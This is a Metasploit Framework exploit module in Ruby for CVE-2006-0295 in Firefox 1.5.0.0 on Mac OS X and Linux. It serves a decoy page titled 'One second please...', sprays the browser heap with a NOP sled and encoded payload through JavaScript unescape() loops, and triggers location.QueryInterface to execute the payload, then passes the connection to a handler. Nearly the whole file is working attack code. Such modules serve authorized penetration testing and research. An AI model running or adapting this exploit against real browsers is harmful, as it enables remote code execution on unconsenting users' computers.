GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/firefox_queryinterface.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers the module's metadata with the framework.
  #
  # Targets are Firefox 1.5.0.0 on Mac OS X (PPC) and on Linux (x86); the
  # underlying issue is CVE-2006-0295 (MFSA 2006-04). Nothing in this method
  # touches a client; the page is only built and served in on_request_uri.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Firefox location.QueryInterface() Code Execution',
        'Description' => %q{
          This module exploits a code execution vulnerability in the Mozilla
          Firefox browser. To reliably exploit this vulnerability, we need to fill
          almost a gigabyte of memory with our nop sled and payload. This module has
          been tested on OS X 10.3 with the stock Firefox 1.5.0 package.
        },
        'License' => MSF_LICENSE,
        'Author' => ['hdm'],
        'References' => [
          ['CVE', '2006-0295'],
          ['OSVDB', '22893'],
          ['BID', '16476'],
          ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],
        ],
        'Payload' => {
          # Space is 1000..2020 bytes, varied per module instance. The payload is
          # delivered inside a JavaScript string via unescape() (see
          # generate_html), presumably why NUL is the only bad character.
          'Space' => 1000 + (rand(256).to_i * 4),
          'BadChars' => "\x00",
        },
        'Platform' => %w{osx linux},
        'Targets' => [
          [
            'Firefox 1.5.0.0 Mac OS X',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC
            }
          ],

          [
            'Firefox 1.5.0.0 Linux',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
        'DisclosureDate' => '2006-02-02',
        # TODO(review): all three notes are still placeholders. The description
        # states that the page fills close to a gigabyte of browser memory, which
        # bears directly on Stability.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Serves the generated page to a connecting browser.
  #
  # Regenerates the payload for this client (returning silently if the
  # framework cannot produce one), sends the page as text/html, then passes
  # the connection to the payload handler.
  #
  # @param cli [Object] the client connection supplied by the HTTP server mixin
  # @param request [Object] the parsed HTTP request (not used here)
  # @return [void]
  def on_request_uri(cli, request)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    print_status("Sending #{self.name}")
    send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
    handler(cli)
  end

  # Builds the HTML document served to the browser.
  #
  # The encoded payload and a 4-byte NOP block are converted with
  # Rex::Text.to_unescape in the target's byte order so JavaScript unescape()
  # reconstructs them client-side. FillHeap() repeats the NOP block 1024*256
  # times, appends the payload once, then concatenates 1024 copies of that
  # string; BodyOnLoad() then calls location.QueryInterface() with
  # nsIClassInfo. The page is served without obfuscation, so the
  # QueryInterface/eval call and the unescape() loops are its fixed,
  # recognisable content.
  #
  # The heredoc body is kept at a single indentation level so that <<~ strips
  # all of it and the emitted page bytes are unchanged.
  #
  # @param payload [Object] the regenerated payload; only payload.encoded is read
  # @return [String] the complete HTML document
  def generate_html(payload)
    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
    enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))

    return <<~EOF
      <html>
      <head>
      <title>One second please...</title>
      <script language="javascript">

      function BodyOnLoad() {
      h = FillHeap();
      location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));
      };

      function FillHeap() {
      // Filler
      var m = "";
      var h = "";
      var a = 0;

      // Nop sled
      for(a=0; a<(1024*256); a++)
      m += unescape("#{enc_nops}");

      // Payload
      m += unescape("#{enc_code}");

      // Repeat
      for(a=0; a<1024; a++)
      h += m;

      // Return
      return h;
      }
      </script>
      </head>
      <body onload="BodyOnLoad()">
      </body>
      </html>
    EOF
  end
end